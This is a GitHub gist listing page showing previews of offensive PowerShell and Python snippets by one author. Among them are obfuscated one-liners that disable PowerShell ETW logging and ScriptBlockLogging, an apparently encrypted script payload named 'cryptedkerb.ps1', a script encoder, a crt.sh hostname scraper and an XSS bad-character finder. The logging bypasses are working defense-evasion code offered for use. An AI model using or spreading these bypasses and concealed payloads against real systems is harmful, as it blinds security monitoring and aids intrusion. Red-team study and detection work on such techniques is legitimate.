reigningshells

@reigningshells
reigningshells / cert-transparency-extractor.py
Last active Jul 20, 2020
Simple script to extract hostnames from cert transparency logs at crt.sh
View cert-transparency-extractor.py
#!/usr/bin/env python3
import sys
import argparse
import requests
from lxml import html
import urllib3
# Nobody wants to see SSL warnings :-P
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
View cryptedkerb.ps1
function Expand-Script($Key)
{
$script = 'aYBcG3Uj0ZnntfLj7RcOGoI2DF7qsMjyiUl8sSgzNuiasymplD/6TedvjCI9NxVWeKoPGahMzCTi7XaBc1qUKQc0sFHiel6Ws4MnXSyd5KOXrTaA6DguIDDJAFypuittSp5ENc6A3SUZUHMB+dDHDwycN6cY6Olq7qB8c5Q2CiTdaieiwp7VbSCAgzJxD4QLQWlxqXDcaJ0caqnaPvUDgJUdgDvO9Ts6JBankNuMTaUsb02+ocZBz/7acSatXFLBQqi+1mAiIBDrCSoMYcFCswS0A9XNN5z/n1Z/ver8Qy53jJDBUrhwI79/4oKtdohzEbSyYtHs6JQKaanPGhtqlAZxiq1Y3IWFzt6xytNx6ULsKIASIo0CQ08dx5ECYZFpulo+LC+NrQxYzNigqkrgdHT01rEQr4EUFslvEknLEDOal9SRX2IfWTvKe64uUbWZmSmqLyOBajlEjvflEog5jKLVTXLY2fpzPVuJQANM8r5TcfO2GS7Sit2sb2cv8yZqWixypQtwqRgAjeDHuhtdKVk3cvfOyS7XoUzyv880DiTr1k5RAX0vxbqStjz41HP4FitJCHjfK4w4QljnllCAjU9n2bvqqQ3t2TMdFH2WTLs//cN1ci3gT3YKLo2UI/PUuZtYfv3pPRwtF+0aZncjAEFB413kUuDyotzFXqcfo0M/kq44LXsi1j7/YvmcJ9q6YfpcDxFmJ4+2wdk28iSMIOz9d303s2FU9K740jcM5ftdCD8/+vAT8lRg7zfUGZ5AHgb7864408gGgI4+xZKGK4FR+0RdAd7zs7D+yeIfWdkmYrcJ72+y7guk0Od+lFHrxQRWQLZ7MDjpjD1+qIu+O4YuSiUtDYLAix0iT3G8o3Kqq9lwZ3P9j42hwoNjrXI0TPY42OTGqZDRPUJl+V4bMy+0GTJ2Vq/+peNI4qjBPH0XPMU4+S1gizFPSPXKz/S4upC3yhP6fie6UVBPZAk
@reigningshells
reigningshells / script-encoder.ps1
Last active Jan 30, 2020
Just some script encoding musings
View script-encoder.ps1
Function Encode-Script
{
Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$Data,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$Key
@reigningshells
reigningshells / powershell-bypasses.ps1
Last active Jul 16, 2020
Random PowerShell Bypasses
View powershell-bypasses.ps1
# Best logging bypass:
[ref]."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# ScriptBlockLogging Bypass
SEt-VARIaBLe O9z0 ([tyPE]("{2}{3}{1}{0}" -f'SEmbly','CTIoN.As','R','EFLE') ) ; sEt-vaRIABLE h2p5ts ([tYPe]("{0}{1}"-F 'r','eF') ) ; ( ChILDItEm VARIAble:o9Z0 )."V`AluE"::"l`oAd`WitHp`A`RTiaL`N`AME"(("{2}{3}{0}{1}"-f'or','e','System','.C'))."g`eTTy`pe"(("{7}{4}{2}{10}{8}{0}{11}{6}{5}{9}{1}{3}"-f 'e','e','stem','r','y','rovi','ntP','S','ics.Ev','d','.Diagnost','nting.Eve'))."GE`TFi`ELD"(("{1}{0}"-f 'abled','m_en'),("{4}{2}{3}{5}{1}{0}" -f 'stance','n','b','li','NonPu','c,I'))."SeT`VALUE"( ( gEt-vARiAbLe h2p5TS -vALUeONLY )."aS`sem`BLy"."G`Ett`YPe"(("{5}{8}{0}{2}{6}{3}{1}{4}{7}"-f 'r','twLogP','acin','E','rovid','System.Manage','g.PS','er','ment.Automation.T'))."G`EtfI`ELd"(("{3}{2}{0}{1}"-f
@reigningshells
reigningshells / badchars.py
Created May 24, 2019
Simple script to identify an XSS filter's "bad characters"
View badchars.py
#!/usr/bin/env python
"""
Very simple script to automate the discovery of
bad characters in XSS filters that replace
the entire user input string with an empty string
[CR] = Carriage Return or \r
[LF] = Line Feed or \n